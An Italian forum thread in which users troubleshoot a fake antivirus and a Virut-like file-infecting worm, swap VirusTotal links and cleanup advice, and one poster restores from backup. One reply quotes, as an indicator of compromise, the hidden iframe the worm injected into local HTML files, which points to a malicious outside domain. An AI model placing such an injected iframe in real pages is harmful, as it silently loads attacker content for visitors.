Caso disperato?

[dore2009]

Sabato si apre la finestra di Secure Antivirus Pro dicendomi che il mio pc è infetto.

Seguo le istruzioni di "Guida alla disinfezione" e per tutti i file *.exe mi viene segnalato che sono infetti e pertanto non parte nulla.

Sembra che l'unica cosa che funziana sia Firefox.

Ho provato a downloadare pgm per la rilevazione/rimozione. Tutto OK in fase di download ma, quando clicco per installare, mi viene segnalato che è infetto.

Ho provato a scaricarlo da altro pc sulla chiavetta, ma quando richiamo l'installazione mi dice che il file sulla chiavetta è infetto.

Ho provato con i programmi che non necessitano di installazione, ma evidentemente qualcosa installano lo stesso, è mi dice che è infetto.

Ho provato a rimetterlo in rete con l'altro pc (controllato e pulito) e far partire l'installazione mi dice che è infetto.

La cosa strana è che sul pc infetto sono installati dei programmi che, dall'altro pc partono con un link, ebbene se parto con il pc infetto mi dice che il programma è infetto, se parto con il link dall'altro pc funziona tutto.

Cosa posso fare?

[Chill-Out]

Ciao e benvenuto, tutti gli .*exe sono percaso infetti da Virut?

[dore2009]

Si Chill-Out.
Almeno così mi dice l'avviso.

[xcdegasp]

Quote:

Originariamente inviato da dore2009

Si Chill-Out.
Almeno così mi dice l'avviso.

potresti includere alcuni di questi eseguibili infetti in un archivio zippato con password e mandarmelo?
così provo a girarlo a eraser che è un ricercatore di Prevx e vediamo se riescono a regalarci un tool per disinfettare il pc

[dore2009]

Sul pc infetto anche winzip non funziona.
Ho copiato alcuni file in Dir\TMP e con il pc sano li ho zippati. Non capisco però come devo fare a inviarli

[xcdegasp]

Quote:

Originariamente inviato da dore2009

Sul pc infetto anche winzip non funziona.
Ho copiato alcuni file in Dir\TMP e con il pc sano li ho zippati. Non capisco però come devo fare a inviarli

grazie, ricevuti

[12pippopluto34]

Anch'io ho un pc con questo worm; ho fatto un'analisi sommaria di due tra i vari files che Avira Antivir PE mi segnala come infetti (li ho appena spediti ad eraser).

Se puo' essere utile alla causa:

1) questo e' il responso di Virustotal:

http://www.virustotal.com/it/analisi...ee9-1259655878

http://www.virustotal.com/it/analisi...f31-1259655922

2) nella prima riga del file hosts ho trovato questo:
127.0.0.1 jL.chura.pl

3) il file C:\Programmi\Mozilla Firefox\res\HiddenWindow.html (ed anche molti altri files html presenti sul pc, tra cui C:\WINDOWS\pchealth\helpctr\System\panels\NavBar.htm che a causa di questo era diventato grande piu' di 20 MB, ripuliti col cleaner di Grisoft http://free.avg.com/us-en/virus-removal.ndi-67762) era stato alterato con questa stringa ripetitiva:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

4) da un diff fatto con WinMerge tra i files infetti e una copia presa da un pc pulito mi pare che le modifiche del worm risiedano nella parte finale dei files infetti (come per la sua variante precedente AFAIR, per la quale avevo usato DrWeb CureIT con esito positivo, mentre stavolta ha fatto completamente cilecca, come dimostra anche Virustotal)

[wjmat]

Quote:

Originariamente inviato da 12pippopluto34

Anch'io ho un pc con questo worm; ho fatto un'analisi sommaria di due tra i vari files che Avira Antivir PE mi segnala come infetti (li ho appena spediti ad eraser).

Se puo' essere utile alla causa:

1) questo e' il responso di Virustotal:

http://www.virustotal.com/it/analisi...ee9-1259655878

http://www.virustotal.com/it/analisi...f31-1259655922

2) nella prima riga del file hosts ho trovato questo:
127.0.0.1 jL.chura.pl

3) il file C:\Programmi\Mozilla Firefox\res\HiddenWindow.html (ed anche molti altri files html presenti sul pc, tra cui C:\WINDOWS\pchealth\helpctr\System\panels\NavBar.htm che a causa di questo era diventato grande piu' di 20 MB, ripuliti col cleaner di Grisoft http://free.avg.com/us-en/virus-removal.ndi-67762) era stato alterato con questa stringa ripetitiva:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

4) da un diff fatto con WinMerge tra i files infetti e una copia presa da un pc pulito mi pare che le modifiche del worm risiedano nella parte finale dei files infetti (come per la sua variante precedente AFAIR, per la quale avevo usato DrWeb CureIT con esito positivo, mentre stavolta ha fatto completamente cilecca, come dimostra anche Virustotal)

ciao

stai ancora cercando di ripulire o hai già preferito formattare?

[12pippopluto34]

Quote:

Originariamente inviato da wjmat

ciao

stai ancora cercando di ripulire o hai già preferito formattare?

Ciao.

No, ancora non ci ho messo le mani, in quanto comunque, pur messa cosi', la macchina funziona perfettamente; pero', stando cosi' le cose, penso che la formattero' quanto prima.

Rimango comunque in attesa, perche' il ripristino di quel pc per me sarebbe alquanto laborioso ed avrei anche pochissimo tempo a disposizione.

[wjmat]

se non hai tempo da perdere meglio formattare in questo caso

[12pippopluto34]

Quote:

Originariamente inviato da wjmat

se non hai tempo da perdere meglio formattare in questo caso

Il problema e' che per intervenire via software posso solamente farlo al max da "Modalita Provvisiona con Rete", perche' dall'altra parte non ho qualcuno che possa usare strumenti come live-cd vari consentendomi di controllare da remoto la macchina; piu' che altro poi avrei proprio poco tempo per formattare e ripristinare tutta la configurazione del pc, per cui se c'e' una soluzione fattibile via VNC senza dover avere a portata di mano cdrom di avvio e/o di ripristino e quant'altro, potrei anche intervenire.

[wjmat]

potrei anche linkare dei tool specifici ma che comunque non risolvono a completamente il problema
ammesso di disinfettare parte dei file ne rimarrebbero sicuramente altri di sistema che sarebbero da rimpiazzare manualmente con un cd/usb avviabile

[12pippopluto34]

Quote:

Originariamente inviato da wjmat

potrei anche linkare dei tool specifici ma che comunque non risolvono a completamente il problema
ammesso di disinfettare parte dei file ne rimarrebbero sicuramente altri di sistema che sarebbero da rimpiazzare manualmente con un cd/usb avviabile

Quello che non mi e' chiaro pero' e' come mai ancora quasi tutti gli antivirus tardano nel prendere contromisure, considerando che questo worm e' una variante e che non provoca, da quel che vedo, profonde modifiche sugli eseguibili, tanto che gli stessi funzionano comunque.

[eraser]

Quote:

Originariamente inviato da 12pippopluto34

Quello che non mi e' chiaro pero' e' come mai ancora quasi tutti gli antivirus tardano nel prendere contromisure, considerando che questo worm e' una variante e che non provoca, da quel che vedo, profonde modifiche sugli eseguibili, tanto che gli stessi funzionano comunque.

Qualsiasi file infector mantiene (o teoricamente dovrebbe, salvo poi corrompere il file per del codice scritto male) il file infetto funzionante. Ciò non significa però che sia facile poi riuscire a scindere il codice del virus da quello del file ospite

[eraser]

Quote:

Originariamente inviato da xcdegasp

potresti includere alcuni di questi eseguibili infetti in un archivio zippato con password e mandarmelo?
così provo a girarlo a eraser che è un ricercatore di Prevx e vediamo se riescono a regalarci un tool per disinfettare il pc

Ho ricevuto la tua e-mail, ma quei file sono puliti Non c'è traccia di Virut all'interno

[dore2009]

Quote:

Originariamente inviato da eraser

Ho ricevuto la tua e-mail, ma quei file sono puliti Non c'è traccia di Virut all'interno

Ho risolto facendo il restore del disco backuppato 2 giorni prima su un HD formattato.
Grazie lo stesso.